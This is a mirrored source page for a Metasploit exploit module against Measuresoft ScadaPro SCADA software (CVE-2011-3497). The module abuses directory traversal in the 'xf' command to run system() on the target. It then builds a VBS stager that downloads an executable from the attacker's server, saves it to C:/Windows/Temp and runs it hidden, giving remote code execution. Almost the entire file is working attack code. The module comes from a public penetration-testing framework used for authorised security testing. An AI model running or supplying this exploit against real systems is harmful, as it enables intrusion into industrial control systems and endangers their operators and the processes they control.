Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/scada/scadapro_cmdexe.rb
57157 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::HttpServer::HTML

10
  include Msf::Exploit::Remote::Tcp

11
  include Msf::Exploit::EXE

12


13
  def initialize(info = {})

14
    super(

15
      update_info(

16
        info,

17
        'Name' => 'Measuresoft ScadaPro Remote Command Execution',

18
        'Description' => %q{

19
          This module allows remote attackers to execute arbitrary commands on the

20
          affected system by abusing via Directory Traversal attack when using the

21
          'xf' command (execute function). An attacker can execute system() from

22
          msvcrt.dll to upload a backdoor and gain remote code execution. This

23
          vulnerability affects version 4.0.0 and earlier.

24
        },

25
        'License' => MSF_LICENSE,

26
        'Author' => [

27
          'Luigi Auriemma', # Initial discovery/poc

28
          'mr_me <steventhomasseeley[at]gmail.com>',  # msf

29
          'TecR0c <tecr0c[at]tecninja.net>',          # msf

30
        ],

31
        'References' => [

32
          [ 'CVE', '2011-3497'],

33
          [ 'OSVDB', '75490'],

34
          [ 'BID', '49613'],

35
          [ 'URL', 'http://aluigi.altervista.org/adv/scadapro_1-adv.txt'],

36
          [ 'URL', 'http://us-cert.gov/control_systems/pdf/ICS-ALERT-11-256-04.pdf'],

37
          # seemed pretty accurate to us ;)

38
          [ 'URL', 'http://www.measuresoft.net/news/post/Inaccurate-Reports-of-Measuresoft-ScadaPro-400-Vulnerability.aspx'],

39
        ],

40
        'DefaultOptions' => {

41
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',

42
        },

43
        'Platform' => 'win',

44
        'Targets' => [

45
          # truly universal

46
          [ 'Automatic', {} ],

47
        ],

48
        'DefaultTarget' => 0,

49
        'DisclosureDate' => '2011-09-16',

50
        'Notes' => {

51
          'Reliability' => UNKNOWN_RELIABILITY,

52
          'Stability' => UNKNOWN_STABILITY,

53
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

54
        }

55
      )

56
    )

57


58
    register_options(

59
      [

60
        Opt::RPORT(11234),

61
        OptString.new('URIPATH', [ true, "The URI to use.", "/" ]),

62
      ]

63
    )

64
  end

65


66
  # couldn't generate a vbs or exe payload and then use the wF command

67
  # as there is a limit to the amount of data to write to disk.

68
  # so we just write out a vbs script like the old days.

69


70
  def build_vbs(url, stager_name)

71
    name_xmlhttp = rand_text_alpha(2)

72
    name_adodb = rand_text_alpha(2)

73


74
    tmp = "#{@temp_folder}/#{stager_name}"

75


76
    vbs = "echo Set #{name_xmlhttp} = CreateObject(\"Microsoft.XMLHTTP\") "

77
    vbs << ": #{name_xmlhttp}.open \"GET\",\"#{url}\",False : #{name_xmlhttp}.send"

78
    vbs << ": Set #{name_adodb} = CreateObject(\"ADODB.Stream\") "

79
    vbs << ": #{name_adodb}.Open : #{name_adodb}.Type=1 "

80
    vbs << ": #{name_adodb}.Write #{name_xmlhttp}.responseBody "

81
    vbs << ": #{name_adodb}.SaveToFile \"#{@temp_folder}/#{@payload_name}.exe\",2 "

82
    vbs << ": CreateObject(\"WScript.Shell\").Run \"#{@temp_folder}/#{@payload_name}.exe\",0 >> #{tmp}"

83


84
    return vbs

85
  end

86


87
  def on_request_uri(cli, request)

88
    if request.uri =~ /\.exe/

89
      print_status("Sending 2nd stage payload")

90
      return if ((p = regenerate_payload(cli)) == nil)

91


92
      data = generate_payload_exe({ :code => p.encoded })

93
      send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })

94
      return

95
    end

96
  end

97


98
  def exploit

99
    # In order to save binary data to the file system the payload is written to a .vbs

100
    # file and execute it from there.

101
    @payload_name = rand_text_alpha(4)

102
    @temp_folder = "C:/Windows/Temp"

103


104
    payload_src = "http://#{Rex::Socket.to_authority(srvhost_addr, srvport)}/"

105
    payload_src << datastore['URIPATH'].delete_prefix('/')

106
    payload_src << '/' unless payload_src.end_with?('/')

107
    payload_src << "#{@payload_name}.exe"

108


109
    stager_name = rand_text_alpha(6) + ".vbs"

110
    stager = build_vbs(payload_src, stager_name)

111


112
    path = "..\\..\\..\\..\\..\\windows\\system32"

113


114
    createvbs = "xf%#{path}\\msvcrt.dll,system,cmd /c #{stager}\r\n"

115
    download_execute = "xf%#{path}\\msvcrt.dll,system,start #{@temp_folder}/#{stager_name}\r\n"

116


117
    print_status("Sending 1st stage payload...")

118


119
    connect

120
    sock.get_once()

121
    sock.put(createvbs)

122
    sock.get_once()

123
    sock.put(download_execute)

124
    handler()

125
    disconnect

126


127
    super

128
  end

129
end

130


131